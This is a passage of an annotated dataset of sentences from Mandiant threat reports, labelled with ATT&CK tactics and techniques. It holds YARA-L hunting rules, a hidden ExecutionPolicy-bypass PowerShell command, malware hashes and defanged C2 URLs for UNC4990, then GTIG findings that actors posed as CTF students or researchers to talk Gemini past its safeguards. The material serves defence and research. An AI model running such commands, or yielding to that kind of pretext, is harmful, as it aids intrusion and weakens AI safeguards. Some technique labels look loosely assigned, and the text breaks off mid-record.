"mandiant-33_mandiant_report-p1-s134-00b13e", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 134, "context_before": "Though the group’s TTPs have evolved over time, UNC4990 operations generally involve widespread USB infection followed by the deployment of the EMPTYSPACE downloader.", "sentence_text": "It is unclear whether UNC4990 is responsible only for initial access and foothold.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s135-e2a81a", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 135, "context_before": "It is unclear whether UNC4990 is responsible only for initial access and foothold.", "sentence_text": "Conclusion\nStarting off with the initial payload served in explorer.ps1, where a custom decoding scheme was developed to the point where it got replaced with asymmetric encryption and the addition of the capability to track infected devices.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s136-750aa3", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 136, "context_before": "Conclusion\nStarting off with the initial payload served in explorer.ps1, where a custom decoding scheme was developed to the point where it got replaced with asymmetric encryption and the addition of the capability to track infected devices.", "sentence_text": "Furthermore, the analysis of both EMPTYSPACE and QUIETBOARD suggests how the threat actors took a modular approach in developing their toolset.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s137-9f31df", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 137, "context_before": "Furthermore, the analysis of both EMPTYSPACE and QUIETBOARD suggests how the threat actors took a modular approach in developing their toolset.", "sentence_text": "QUIETBOARD started by only having one module and then more functionality was incrementally added.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s138-133fec", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 138, "context_before": "QUIETBOARD started by only having one module and then more functionality was incrementally added.", "sentence_text": "Similarly, the Python variant of EMPTYSPACE shows clear signs of versioning.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s139-daa5db", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 139, "context_before": "Similarly, the Python variant of EMPTYSPACE shows clear signs of versioning.", "sentence_text": "The use of multiple programming languages to create different versions of the EMPTYSPACE downloader and the URL change when the Vimeo video was taken down show a predisposition for experimentation and adaptability on the threat actors’ side.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s140-1aa135", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 140, "context_before": "The use of multiple programming languages to create different versions of the EMPTYSPACE downloader and the URL change when the Vimeo video was taken down show a predisposition for experimentation and adaptability on the threat actors’ side.", "sentence_text": "Detection Opportunities\nYARA-L Rules\nrule M_YARAL_UNC4990_NETWORK_INDICATORS\n{\nmeta:\nauthor = \"Mandiant\" description = \"This rule is for hunting purposes only and has not been tested to run in a production environment.\"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s141-7ddde4", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 141, "context_before": "Detection Opportunities\nYARA-L Rules\nrule M_YARAL_UNC4990_NETWORK_INDICATORS\n{\nmeta:\nauthor = \"Mandiant\" description = \"This rule is for hunting purposes only and has not been tested to run in a production environment.\"", "sentence_text": "severity = \"Low\" reference = \" https://cloud.google.com/chronicle/docs/detection/yara-l-2-0-overview\" events:\n(\n$e.metadata.event_type = \"NETWORK_CONNECTION\" or $e.metadata.event_type = \"NETWORK_DNS\" or $e.metadata.event_type = \"NETWORK_HTTP\" ) and ( ( $e.target.hostname = `bobsmith.apiworld.cf` nocase and re.regex($e.target.url, `license\\.php`) nocase and $e.network.http.method = `POST` nocase ) or ( re.regex($e.target.url, `/updater\\.php\\?from=USB1`)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s142-5823da", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 142, "context_before": "severity = \"Low\" reference = \" https://cloud.google.com/chronicle/docs/detection/yara-l-2-0-overview\" events:\n(\n$e.metadata.event_type = \"NETWORK_CONNECTION\" or $e.metadata.event_type = \"NETWORK_DNS\" or $e.metadata.event_type = \"NETWORK_HTTP\" ) and ( ( $e.target.hostname = `bobsmith.apiworld.cf` nocase and re.regex($e.target.url, `license\\.php`) nocase and $e.network.http.method = `POST` nocase ) or ( re.regex($e.target.url, `/updater\\.php\\?from=USB1`)", "sentence_text": "nocase and\n(\n$e.target.hostname = `evinfeoptasw.dedyn.io` nocase or $e.target.hostname = `wjecpujpanmwm.tk` nocase )\n) or\n(\nre.regex($e.principal.process.file.full_path, `powershell\\.exe$`)\nnocase and\n(\nre.regex($e.target.hostname, `vimeo\\.com`) nocase or re.regex($e.target.hostname, `arstechnica\\.com`) nocase )\n) or\n(\nre.regex($e.principal.process.file.full_path, `powershell\\.exe$`)\nnocase and\n(\n$e.network.dns.questions.name = `vimeo.com` nocase or $e.network.dns.questions.name = `arstechnica.com` nocase )\n)\n)\ncondition:\n$e\n}\nrule M_YARAL_UNC4990_HOST_INDICATORS_1\n{\nmeta:\nauthor = \"Mandiant\" description = \"This rule is for hunting purposes only and has not been tested to run in a production environment.\"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s143-6d15f5", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 143, "context_before": "nocase and\n(\n$e.target.hostname = `evinfeoptasw.dedyn.io` nocase or $e.target.hostname = `wjecpujpanmwm.tk` nocase )\n) or\n(\nre.regex($e.principal.process.file.full_path, `powershell\\.exe$`)\nnocase and\n(\nre.regex($e.target.hostname, `vimeo\\.com`) nocase or re.regex($e.target.hostname, `arstechnica\\.com`) nocase )\n) or\n(\nre.regex($e.principal.process.file.full_path, `powershell\\.exe$`)\nnocase and\n(\n$e.network.dns.questions.name = `vimeo.com` nocase or $e.network.dns.questions.name = `arstechnica.com` nocase )\n)\n)\ncondition:\n$e\n}\nrule M_YARAL_UNC4990_HOST_INDICATORS_1\n{\nmeta:\nauthor = \"Mandiant\" description = \"This rule is for hunting purposes only and has not been tested to run in a production environment.\"", "sentence_text": "severity = \"Low\" reference = \" https://cloud.google.com/chronicle/docs/detection/yara-l-2-0-overview\" events:\n(\n$e.metadata.event_type = \"FILE_CREATION\" or $e.metadata.event_type = \"FILE_MODIFICATION\" or $e.metadata.event_type = \"REGISTRY_CREATION\" or $e.metadata.event_type = \"REGISTRY_DELETION\" or $e.metadata.event_type = \"REGISTRY_MODIFICATION\" ) and ( re.regex($e.target.file.full_path, `RuntimeBroker\\s\\.exe`)\nnocase or\nre.regex($e.target.file.full_path, `\\\\Windows\\\\RuntimeBroker \\.exe`)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s144-fa2649", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 144, "context_before": "severity = \"Low\" reference = \" https://cloud.google.com/chronicle/docs/detection/yara-l-2-0-overview\" events:\n(\n$e.metadata.event_type = \"FILE_CREATION\" or $e.metadata.event_type = \"FILE_MODIFICATION\" or $e.metadata.event_type = \"REGISTRY_CREATION\" or $e.metadata.event_type = \"REGISTRY_DELETION\" or $e.metadata.event_type = \"REGISTRY_MODIFICATION\" ) and ( re.regex($e.target.file.full_path, `RuntimeBroker\\s\\.exe`)\nnocase or\nre.regex($e.target.file.full_path, `\\\\Windows\\\\RuntimeBroker \\.exe`)", "sentence_text": "nocase or\nre.regex($e.target.file.full_path, `Temp\\\\Runtime Broker\\.exe`)\nnocase or\nre.regex($e.target.file.full_path, `WinSoft Update Service`)\nnocase or\nre.regex($e.target.registry.registry_key,\n`HKCU\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Node_Run`)\nnocase\n)\ncondition:\n$e\n}\nrule M_YARAL_UNC4990_HOST_INDICATORS_2\n{\nmeta:\nauthor = \"Mandiant\" description = \"This rule is for hunting purposes only and has not been tested to run in a production environment.\"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s145-632656", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 145, "context_before": "nocase or re.regex(...)", "sentence_text": "severity = \"Low\" reference = \" https://cloud.google.com/chronicle/docs/detection/yara-l-2-0-overview\" events: $e.metadata.event_type = \"PROCESS_LAUNCH\" re.regex($e.target.process.file.full_path, `powershell\\.exe$`)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s146-091bba", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 146, "context_before": "severity = \"Low\" reference = \" https://cloud.google.com/chronicle/docs/detection/yara-l-2-0-overview\" events:\n$e.metadata.event_type = \"PROCESS_LAUNCH\" re.regex($e.target.process.file.full_path, `powershell\\.exe$`)", "sentence_text": "nocase and\nre.regex($e.principal.process.file.full_path, `explorer\\.exe$`)\nnocase and\nre.regex($e.target.process.command_line, `\\-windowstyle hidden \\-NoProfile \\-nologo \\-ExecutionPolicy ByPass \\-File explorer\\.ps1`) nocase condition:\n$e\n}\nIndicators of Compromise Host-Based IOCs Network-Based IOCs Organizations can validate their security controls using the following actions with Acknowledgement Blas Kojusner, Dimiter Andonov, Elvis Miezitis, Mike Hunhoff, Moritz Raabe, Mustafa Nasser, Nikolay Marinov Posted in Threat Intelligence Related articles Threat Intelligence GTIG AI Threat Tracker: Advances in Threat Actor Usage of AI Tools By Google Threat Intelligence Group • 30-minute read Threat Intelligence Preparing for Threats to Come: Cybersecurity Forecast 2026", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s147-f4b608", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 147, "context_before": "nocase and\nre.regex($e.principal.process.file.full_path, `explorer\\.exe$`)\nnocase and\nre.regex($e.target.process.command_line, `\\-windowstyle hidden \\-NoProfile \\-nologo \\-ExecutionPolicy ByPass \\-File explorer\\.ps1`) nocase condition:\n$e\n}\nIndicators of Compromise Host-Based IOCs Network-Based IOCs Organizations can validate their security controls using the following actions with Acknowledgement Blas Kojusner, Dimiter Andonov, Elvis Miezitis, Mike Hunhoff, Moritz Raabe, Mustafa Nasser, Nikolay Marinov Posted in Threat Intelligence Related articles Threat Intelligence GTIG AI Threat Tracker: Advances in Threat Actor Usage of AI Tools By Google Threat Intelligence Group • 30-minute read Threat Intelligence Preparing for Threats to Come: Cybersecurity Forecast 2026", "sentence_text": "By Adam Greenberg • 4-minute read Threat Intelligence Keys to the Kingdom: A Defender's Guide to Privileged Account Monitoring By Mandiant • 39-minute read Threat Intelligence Help Wanted: Vietnamese Actors Using Fake Job", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s148-97ed19", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 148, "context_before": "By Adam Greenberg • 4-minute read Threat Intelligence Keys to the Kingdom: A Defender's Guide to Privileged Account Monitoring By Mandiant • 39-minute read Threat Intelligence Help Wanted: Vietnamese Actors Using Fake Job", "sentence_text": "Posting Campaigns to Deliver Malware and Steal Credentials By Google Threat Intelligence Group • 6-minute read [FILTERED_TABLES_START]\nLNK shortcut file spawning PowerShell script from command line | T1204 T1059.001", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s149-2e61fa", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 149, "context_before": "Posting Campaigns to Deliver Malware and Steal Credentials By Google Threat Intelligence Group • 6-minute read [FILTERED_TABLES_START]\nLNK shortcut file spawning PowerShell script from command line | T1204 T1059.001", "sentence_text": "| Parent Process: C:\\Windows\\explorer.exe", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s150-3b4360", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 150, "context_before": "| Parent Process: C:\\Windows\\explorer.exe", "sentence_text": "Process: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Command Line Examples: \"powershell.exe\" -windowstyle hidden -NoProfile -nologo -ExecutionPolicy", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s151-b57026", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 151, "context_before": "Process: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Command Line Examples: \"powershell.exe\" -windowstyle hidden -NoProfile -nologo -ExecutionPolicy", "sentence_text": "ByPass -File explorer.ps1 powershell.exe -windowstyle hidden -NoProfile -nologo -ExecutionPolicy", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s152-0f6231", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 152, "context_before": "ByPass -File explorer.ps1 powershell.exe -windowstyle hidden -NoProfile -nologo -ExecutionPolicy", "sentence_text": "ByPass -File explorer.ps1 \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -windowstyle hidden -NoProfile -nologo -ExecutionPolicy", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s153-5baf1f", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 153, "context_before": "ByPass -File explorer.ps1 \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -windowstyle hidden -NoProfile -nologo -ExecutionPolicy", "sentence_text": "ByPass -File explorer.ps1 Runtime Broker.exe binary file writes with whitespaces within the binary name or before the file extension | T1036.005 | File Write:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s154-41350b", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 154, "context_before": "ByPass -File explorer.ps1 Runtime Broker.exe binary file writes with whitespaces within the binary name or before the file extension | T1036.005 | File Write:", "sentence_text": "C:\\Users\\\\AppData\\Local\\Temp\\Runtime Broker.exe C:\\Windows\\RuntimeBroker .exe", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s155-be6d66", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 155, "context_before": "C:\\Users\\\\AppData\\Local\\Temp\\Runtime Broker.exe C:\\Windows\\RuntimeBroker .exe", "sentence_text": "explorer.ps1 | 72f1ba6309c98cd52ffc99dd15c45698dfca2d6ce1ef0bf262433b5dfff084be 98594dfae6031c9bdf62a4fe2e2d2821730115d46fca61da9a6cc225c6c4a750 d09d1a299c000de6b7986078518fa0defa3278e318c7f69449c02f177d3228f0 7c793cc33721bae13e200f24e8d9f51251dd017eb799d0172fd647acab039027 6fb4945bb73ac3f447fb7af6bd2937395a067a6e0c0900886095436114a17443", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s156-1a9704", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 156, "context_before": "explorer.ps1 | 72f1ba6309c98cd52ffc99dd15c45698dfca2d6ce1ef0bf262433b5dfff084be 98594dfae6031c9bdf62a4fe2e2d2821730115d46fca61da9a6cc225c6c4a750 d09d1a299c000de6b7986078518fa0defa3278e318c7f69449c02f177d3228f0 7c793cc33721bae13e200f24e8d9f51251dd017eb799d0172fd647acab039027 6fb4945bb73ac3f447fb7af6bd2937395a067a6e0c0900886095436114a17443", "sentence_text": "| PowerShell Script %TEMP%\\Runtime Broker.exe | a4f20b60a50345ddf3ac71b6e8c5ebcb9d069721b0b0edc822ed2e7569a0bb40", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s157-23b203", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 157, "context_before": "| PowerShell Script %TEMP%\\Runtime Broker.exe | a4f20b60a50345ddf3ac71b6e8c5ebcb9d069721b0b0edc822ed2e7569a0bb40", "sentence_text": "| EMPTYSPACE Downloader (Node.JS Variant)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s158-ca46fb", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 158, "context_before": "| EMPTYSPACE Downloader (Node.JS Variant)", "sentence_text": "Runtime Broker.exe | 8a492973b12f84f49c52216d8c29755597f0b92a02311286b1f75ef5c265c30d", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s159-9374c7", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 159, "context_before": "Runtime Broker.exe | 8a492973b12f84f49c52216d8c29755597f0b92a02311286b1f75ef5c265c30d", "sentence_text": "| EMPTYSPACE Downloader (.NET Variant)\nC:\\Program Files (x86)\\WinSoft Update Service\\bootstrap.pyc | V1: 060882f97ace7cb6238e714fd48b3448939699e9f085418af351c42b401a1227 V2: 8c25b73245ada24d2002936ea0f3bcc296fdcc9071770d81800a2e76bfca3617 V3: b9ffba378d4165f003f41a619692a8898aed2e819347b25994f7a5e771045217 V4: 84674ae8db63036d1178bb42fa5d1b506c96b3b22ce22a261054ef4d021d2c69 | EMPTYSPACE Downloader (Python Variant)\nC:\\Program Files (x86)\\WinSoft Update Service\\program.pyz | 15d977dae1726c2944b0b4965980a92d8e8616da20e4d47d74120073cbc701b3 26d93501cb9d85b34f2e14d7d2f3c94501f0aaa518fed97ce2e8d9347990decf 26e943db620c024b5e87462c147514c990f380a4861d3025cf8fc1d80a74059a | QUIETBOARD Backdoor C:\\windows\\runtimebroker .exe", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s160-2cab22", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 160, "context_before": "| EMPTYSPACE Downloader (.NET Variant)\nC:\\Program Files (x86)\\WinSoft Update Service\\bootstrap.pyc | V1: 060882f97ace7cb6238e714fd48b3448939699e9f085418af351c42b401a1227 V2: 8c25b73245ada24d2002936ea0f3bcc296fdcc9071770d81800a2e76bfca3617 V3: b9ffba378d4165f003f41a619692a8898aed2e819347b25994f7a5e771045217 V4: 84674ae8db63036d1178bb42fa5d1b506c96b3b22ce22a261054ef4d021d2c69 | EMPTYSPACE Downloader (Python Variant)\nC:\\Program Files (x86)\\WinSoft Update Service\\program.pyz | 15d977dae1726c2944b0b4965980a92d8e8616da20e4d47d74120073cbc701b3 26d93501cb9d85b34f2e14d7d2f3c94501f0aaa518fed97ce2e8d9347990decf 26e943db620c024b5e87462c147514c990f380a4861d3025cf8fc1d80a74059a | QUIETBOARD Backdoor C:\\windows\\runtimebroker .exe", "sentence_text": "| 71c9ce52da89c32ee018722683c3ffbc90e4a44c5fba2bd674d28b573fba1fdc | QUIETBOARD associated file C:\\Program Files (x86)\\pyt37\\python37.zip | 539a79f716cf359dceaa290398bc629010b6e02e47eaed2356074bffa072052f | QUIETBOARD associated file hxxps://bobsmith.apiworld[.]cf/license.php hxxps://evinfeoptasw.dedyn[.]io/updater.php hxxps://wjecpujpanmwm[.]tk/updater.php?from=USB1 hxxps://eldi8.github[.]io/src.txt hxxps://evh001.gitlab[.]io/src.txt hxxps://vimeo[.]com/api/v2/video/804838895.json hxxps://luke.compeyson.eu[.]org/runservice/api/public.php hxxps://luke.compeyson.eu[.]org/runservice/api/public_result.php hxxps://eu1.microtunnel[.]it/c0s1ta/index.php hxxps://lucaespo.altervista[.]org/updater.php hxxps://lucaesposito.herokuapp[.]com/c0s1ta/index.php hxxps://euserv3.herokuapp[.]com/c0s1ta/index.php A106-893 | Host CLI - UNC4990, EMPTYSPACE, Persistence via Registry A106-898 | Command and Control - UNC4990, EMPTYSPACE, DNS Query, Variant #1 A106-901 | Command and Control - UNC4990, DNS Query, Variant #1", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-33_mandiant_report-p1-s161-5a74af", "source": "mandiant", "doc_id": "33_mandiant_report", "page_number": 1, "sentence_id": 161, "context_before": "| 71c9ce52da89c32ee018722683c3ffbc90e4a44c5fba2bd674d28b573fba1fdc | QUIETBOARD associated file C:\\Program Files (x86)\\pyt37\\python37.zip | 539a79f716cf359dceaa290398bc629010b6e02e47eaed2356074bffa072052f | QUIETBOARD associated file hxxps://bobsmith.apiworld[.]cf/license.php hxxps://evinfeoptasw.dedyn[.]io/updater.php hxxps://wjecpujpanmwm[.]tk/updater.php?from=USB1 hxxps://eldi8.github[.]io/src.txt hxxps://evh001.gitlab[.]io/src.txt hxxps://vimeo[.]com/api/v2/video/804838895.json hxxps://luke.compeyson.eu[.]org/runservice/api/public.php hxxps://luke.compeyson.eu[.]org/runservice/api/public_result.php hxxps://eu1.microtunnel[.]it/c0s1ta/index.php hxxps://lucaespo.altervista[.]org/updater.php hxxps://lucaesposito.herokuapp[.]com/c0s1ta/index.php hxxps://euserv3.herokuapp[.]com/c0s1ta/index.php A106-893 | Host CLI - UNC4990, EMPTYSPACE, Persistence via Registry A106-898 | Command and Control - UNC4990, EMPTYSPACE, DNS Query, Variant #1 A106-901 | Command and Control - UNC4990, DNS Query, Variant #1", "sentence_text": "[FILTERED_TABLES_END]", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-34_mandiant_report-p1-s1-f8c98a", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "GTIG AI Threat Tracker: Advances in Threat Actor Usage of AI Tools | Google Cloud Blog Threat Intelligence GTIG AI Threat Tracker: Advances in Threat Actor Usage of AI Tools November 6, 2025 Google Threat Intelligence Group Google Threat Intelligence Visibility and context on the threats that matter most.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-34_mandiant_report-p1-s2-610a91", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 2, "context_before": "GTIG AI Threat Tracker: Advances in Threat Actor Usage of AI Tools | Google Cloud Blog Threat Intelligence GTIG AI Threat Tracker: Advances in Threat Actor Usage of AI Tools November 6, 2025 Google Threat Intelligence Group Google Threat Intelligence Visibility and context on the threats that matter most.", "sentence_text": "This marks a new operational phase of AI abuse, involving tools that dynamically alter behavior mid-execution.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-34_mandiant_report-p1-s3-487ad3", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 3, "context_before": "This marks a new operational phase of AI abuse, involving tools that dynamically alter behavior mid-execution.", "sentence_text": "Our findings are based on the broader threat landscape.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-34_mandiant_report-p1-s4-a326ad", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 4, "context_before": "Our findings are based on the broader threat landscape.", "sentence_text": "We also proactively share industry best practices to arm defenders and enable stronger protections across the ecosystem.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-34_mandiant_report-p1-s5-499438", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 5, "context_before": "We also proactively share industry best practices to arm defenders and enable stronger protections across the ecosystem.", "sentence_text": "Throughout this report we’ve noted steps we’ve taken to thwart malicious activity, including disabling assets and applying intel to strengthen both our classifiers and model so it’s protected from misuse moving forward.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-34_mandiant_report-p1-s6-e62c41", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 6, "context_before": "Throughout this report we’ve noted steps we’ve taken to thwart malicious activity, including disabling assets and applying intel to strengthen both our classifiers and model so it’s protected from misuse moving forward.", "sentence_text": "Additional details on how we’re protecting and defending Gemini can be found in this white paper , “ Advancing Gemini’s Security Safeguards .”", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-34_mandiant_report-p1-s7-cf2d50", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 7, "context_before": "Additional details on how we’re protecting and defending Gemini can be found in this white paper , “ Advancing Gemini’s Security Safeguards .”", "sentence_text": "Key Findings First Use of \"Just-in-Time\" AI in Malware:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-34_mandiant_report-p1-s8-c09141", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 8, "context_before": "Key Findings First Use of \"Just-in-Time\" AI in Malware:", "sentence_text": "While still nascent, this represents a significant step toward more autonomous and adaptive malware.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-34_mandiant_report-p1-s9-905d7b", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 9, "context_before": "While still nascent, this represents a significant step toward more autonomous and adaptive malware.", "sentence_text": "\"Social Engineering\" to Bypass Safeguards:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-34_mandiant_report-p1-s10-0818aa", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 10, "context_before": "\"Social Engineering\" to Bypass Safeguards:\nThreat actors are adopting social engineering-like pretexts in their prompts to bypass AI safety guardrails.", "sentence_text": "We observed actors posing as students in a \"capture-the-flag\" competition or as cybersecurity researchers to persuade Gemini to provide information that would otherwise be blocked, enabling tool development.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1650", "name": "Acquire Access" } ], "procedure": "Pose as students or researchers to persuade an AI system to provide restricted information.", "entities": [ { "text": "actors posing as students in a \"capture-the-flag\" competition or as cybersecurity researchers to persuade Gemini to provide information that would otherwise be blocked", "start": 12, "end": 179, "label": "Action" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s11-e2004d", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 11, "context_before": "We observed actors posing as students in a \"capture-the-flag\" competition or as cybersecurity researchers to persuade Gemini to provide information that would otherwise be blocked, enabling tool development.", "sentence_text": "Maturing Cyber Crime Marketplace for AI Tooling:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-34_mandiant_report-p1-s12-4f65d2", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 12, "context_before": "Maturing Cyber Crime Marketplace for AI Tooling:\nThe underground marketplace for illicit AI tools has matured in 2025.", "sentence_text": "We have identified multiple offerings of multifunctional tools designed to support phishing, malware development, and vulnerability research, lowering the barrier to entry for less sophisticated actors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-34_mandiant_report-p1-s13-918c51", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 13, "context_before": "We have identified multiple offerings of multifunctional tools designed to support phishing, malware development, and vulnerability research, lowering the barrier to entry for less sophisticated actors.", "sentence_text": "Continued Augmentation of the Full Attack Lifecycle:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-34_mandiant_report-p1-s14-2f528b", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 14, "context_before": "Continued Augmentation of the Full Attack Lifecycle:\nState-sponsored actors including from North Korea, Iran, and the People's Republic of China (PRC) continue to misuse Gemini to enhance all stages of their operations, from reconnaissance and phishing lure creation to command and control (C2) development and data exfiltration.", "sentence_text": "Threat Actors Developing Novel AI Capabilities For the first time in 2025, GTIG discovered a code family that employed AI capabilities mid-execution to dynamically alter the malware’s behavior.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Malware uses mid-execution AI inference to adjust behavior dynamically, supporting stealth or capability enhancement", "entities": [ { "text": "Threat Actors", "start": 0, "end": 13, "label": "ThreatActor" }, { "text": " Developing Novel AI Capabilities For ", "start": 13, "end": 51, "label": "Action" }, { "text": "that employed AI capabilities mid-execution to dynamically alter", "start": 105, "end": 169, "label": "Action" } ] }, { "uid": "mandiant-34_mandiant_report-p1-s15-7e200c", "source": "mandiant", "doc_id": "34_mandiant_report", "page_number": 1, "sentence_id": 15, "context_before": "Threat Actors Developing Novel AI Capabilities For the first time in 2025, GTIG discovered a code family that employed AI capabilities mid-execution to dynamically alter the malware’s behavior.", "sentence_text": "Although some recent implementations of novel AI techniques are experimental, they provide an early indicator of how threats are evolving and how they can potentially integrate AI capabilities into future intrusion activity.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": 